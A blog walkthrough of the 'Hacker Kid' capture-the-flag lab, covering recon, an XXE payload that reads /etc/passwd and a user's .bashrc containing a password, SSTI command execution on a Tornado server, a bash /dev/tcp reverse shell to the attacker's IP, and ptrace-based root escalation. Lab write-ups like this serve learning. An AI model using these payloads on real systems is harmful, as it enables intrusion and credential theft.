CTF hacker kid

CTF SSTI
Created At :
Count:1.3k Views 👀 :
  1. netdiscover
  2. nmap
  3. Port 80
    1. web page
    2. gobuster
  4. Port 9999
    1. gobuster
    2. source code
  5. Back to port 80
  6. /etc/hosts
  7. dig
  8. xxe exploit
    1. Read the bashrc
  9. Tornado server
  10. SSTI
    1. Reversshell
  11. Enumeration
    1. Create web server
    2. Download them
    3. Bash history
  12. exploit

netdiscover

192.168.0.32

nmap

nmap -Sv 192.168.0.32 -p-

PORT     STATE SERVICE VERSION
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
9999/tcp open  http    Tornado httpd 6.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

web page

gobuster

gobuster dir -t 100 -u http://192.168.0.32/ -w Documents/wordlist/directory-list-medium.txt 

/css                  (Status: 301) [Size: 310] [--> http://192.168.0.32/css/]
/javascript           (Status: 301) [Size: 317] [--> http://192.168.0.32/javascript/]
/images               (Status: 301) [Size: 313] [--> http://192.168.0.32/images/]    
/server-status        (Status: 403) [Size: 277]

Nothing interesting.

Port 9999

http://192.168.0.32:9999/login?next=%2F

gobuster

gobuster dir -t 100 -u http://192.168.0.32:9999/ -w Documents/wordlist/directory-list-medium.txt 

/login                (Status: 200) [Size: 452]
/logout               (Status: 302) [Size: 0] [--> /]

source code

I remove the hidden argument.

I have something to do with the xsrf cookie but it’s too hard to find the right cookie to inject.

Back to port 80

TO DO: Use a GET parameter page_no to view pages.

So I have to do something like this:
http://192.168.0.32/index.php?page_no=1
And it’s working:

I will script something, I can do it with burpsuit too.
I’m grabing the size of the page.

i=0
n=3654
while true; do
	size=$(curl -so /dev/null  http://192.168.0.32/index.php\?page_no\=$i -w '%{size_download}')
	echo "$i: $size"
	if [ $size != $n ]; then
		break
	fi
	((i=i+1))
done

Output:

➜  hackerkid ./c.sh 
0: 3654
1: 3654
2: 3654
3: 3654
4: 3654
5: 3654
6: 3654
7: 3654
8: 3654
9: 3654
10: 3654
11: 3654
12: 3654
13: 3654
14: 3654
15: 3654
16: 3654
17: 3654
18: 3654
19: 3654
20: 3654
21: 3849

Page 21
http://192.168.0.32/index.php?page_no=21

/etc/hosts

I’m adding this line to my file.

192.168.0.32 hacker.blackhat.local blackhat.local

dig

I have to use dig on the domain name.

dig hackers.blackhat.local @192.168.0.32
; <<>> DiG 9.18.0 <<>> hackers.blackhat.local @192.168.0.32
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 17027
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: a2f3e2323bd5863f010000006212500721681d408206f9d6 (good)
;; QUESTION SECTION:
;hackers.blackhat.local.		IN	A

;; AUTHORITY SECTION:
blackhat.local.		3600	IN	SOA	blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600

;; Query time: 3 msec
;; SERVER: 192.168.0.32#53(192.168.0.32) (UDP)
;; WHEN: Sun Feb 20 15:28:23 CET 2022
;; MSG SIZE  rcvd: 125

COOKIE: a2f3e2323bd5863f010000006212500721681d408206f9d6 (good)
hackerkid.blackhat.local

Now I have to add it to my hosts file.

hackerkid.blackhat.local

xxe exploit

The form is build with xml, so I can exploit it with a xxe exploit.
https://infosecwriteups.com/exploiting-xml-external-entity-xxe-injection-vulnerability-f8c4094fef83

You have to type this in the xml request, it will display nothing.

<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

And then display it wih this:

&xxe;

But you can’t put it anywhere, it have to replace the email content.

Read the bashrc

Fist I tryed to download a file then execute it with php.
And use curl -O on a revershell script but it’s not working too.
https://cxyy4rle.blogspot.com/2019/10/reading-local-files-with-xxe-attacks.html

I willl try this on the user saket, I saw him in the /etc/passwd.

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bashrc" >]>

Now I have to decode it:
https://www.base64decode.org/ 

#Setting Password for running python app
username="admin"
password="Saket!#$%@!!"

Tornado server

I have to login to the website with there’s credentials.
http://192.168.0.32:9999/login?next=%2F
I’m using saket because it’s not working with admin, and this user is un the /etc/passwd file and in the password.

I’m logged.

There is nothing else on this page.

Tell me your name buddy  
How can i get to know who are you ??

He want a name, and he is using the word get, I’m not the best in english but, I think this sentence could be “how can I know who you are?”
So I have to get a name.

SSTI

https://support.clickmeter.com/hc/en-us/articles/211032666-URL-parameters-How-to-pass-it-to-the-destination-URL
 www.yoursite.com?myparam={id}
Let’s try it:
http://192.168.0.32:9999/?name={id}

Can I do something with this?
http://192.168.0.32:9999/?name=49

This is good, the name of what I’m doing is Server Side Template Injection (SSTI).

Reversshell

So I found a way to exec a command. 

http://192.168.0.32:9999/?name={%import%20os%}{{os.popen(%22whoami%22).read()}}

Good now I want to use a revershell.
I’m gonnna use this one: 

bash -c "bash -i >& /dev/tcp/192.168.0.21/4648 0>&1"

But when I’m trying to run it in my browser I have an error.
I have to use burpsuit.
With this tool I saw where was the problem, the & was not in the payload, it was interpreted as an another command.
I have to encode my request and then send it.
https://www.urlencoder.org/

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.21/4648 0>&1"')}}

Output:

%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.21%2F4648%200%3E%261%22%27%29%7D%7D

I have to listen first.

nc -nlvp 4648

Enumeration

Create web server

On my computer.

python2.7 -m SimpleHTTPServer

Download them

wget http://192.168.0.21:8000/lse.sh
wget http://192.168.0.21:8000/lin.py

Nothing interesting

Bash history

Only this part is interesting.

python2.7 inject.py 405
nc 127.0.0.1 5600
ps -eax|grep root
ps -eaf|grep root
python2.7 inject.py 735
nc 127.0.0.1 5600

So, in the first line he is using an injector on the PID 405.
Then open netcat to listen.
I think it was the wrong PID so he list them.
He list the PID with root permisions.
Then use the injector with the good PID
And he use the commands:

ps -eax|grep root
ps -eaf|grep root

exploit

https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc

saket@ubuntu:~$ ps -eaf|grep root
ps -eaf|grep apache
root        1363       1  0 05:44 ?        00:00:00 /usr/sbin/apache2 -k start

The PID is 1363.

python2 inject.py 1363

You can check the open port, it should be 5600.

netstat -tnlp

Then we can use netcat to listen on the port.

nc 127.0.0.1 5600

Now you are root.

©2021 Peanutstick’s Blog

Built with Hexo and 3-hexo theme

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme